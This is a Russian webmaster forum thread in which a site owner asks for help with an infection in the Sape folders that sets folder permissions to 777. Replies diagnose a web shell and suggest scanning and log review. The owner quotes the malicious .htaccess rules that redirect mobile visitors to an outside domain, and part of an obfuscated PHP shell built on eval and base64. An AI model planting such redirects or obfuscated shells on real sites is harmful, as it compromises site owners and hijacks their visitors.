вирус в папке sape, меняет права на папки

RF
На сайте с 07.04.2008
Offline
158
1112

какой-то вирус меняет права на папки 777. После чего сайты на инфобоксе перестают работать.

вот, что нашел в .htaccess

RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile-content.info/direct.php [L,R=302]

в папках сапе появились фаилы примерно с такими названиями scripts.php, percent.php и.т.д.

Там примерно такой код

*/
$auth_pass = "cd96fe43ae3dedd1bf4b80af703b1c1f";
eval("\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050\163\164\162\162\145\166\050'=sDdphXZgsTKddSYnsFVT9EUfRCIuAyJu9Wa0NWYngyYuVnZfJXZzV3XsxWYjBSKgkSXnE2JbR1UPB1XkAiLgcibvlGdjF2JoMHdzlGel9lbvlGdj5WdmBiJmASKddSYnsFVT9EUfRCK5RHctVWIggiZpByOn8mZul0YlN1Jg0DIddSYnmZAByOpkCdkgSZk92YlR2X0YTZzFmYAxWVyMmd4JTWKt2ZD50cqlUd4ZEVNZVRTRlUDlEbShFZqZ1RlxmQDRWdGJTIvh2YlBSfg0HI7ciP2lGZvwzJukSKoI3byJXZ+0iYkRCKzJXYoNGbhl2YlB3cs1Gdo5yJg4

если удалить эти файлы, то сайт перестает работать

Может кто сталкивался, что это и как это убить?

Garin33
На сайте с 31.08.2009
Offline
169
#1

Шелл вам залили видимо.

http://www.revisium.com/ai/ проверяйте. И ищите пути заливки по логам, если они сохранились. Возможно пароли утекли, или CMS не обновляли (дырявая она), или кому-то доступ давали.

Плюс надо искать - где еще есть обращения к этим файлам, если говорите, что при удалении сайт перестает работать. Код сапы лучше скачать снова.

Потому что Drupal - это круто.
RF
На сайте с 07.04.2008
Offline
158
#2

Garin33, AI-Bolit почему-то не работает на инфобоксе.

Garin33
На сайте с 31.08.2009
Offline
169
#3

Это, как ни крути, проблема инфобокса. Как вариант - временно перенести на другой хостинг, и сделать поиск на нем.

кот Бегемот
На сайте с 07.12.2009
Offline
278
#4
RED FOX:
Garin33, AI-Bolit почему-то не работает на инфобоксе.

FAQ читайте к айболиту.. Там описано почему может не работать.

Яндекс Директ, Гугд адворс, не дорого и ответственно. Телеграмм @H_Ilin
RF
На сайте с 07.04.2008
Offline
158
#5

вроде нашел все зараженные фаилы и удалил вредоносный код. Подскажите, возможно есть способ какого-то оповещения о подобной хакерской атаке?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий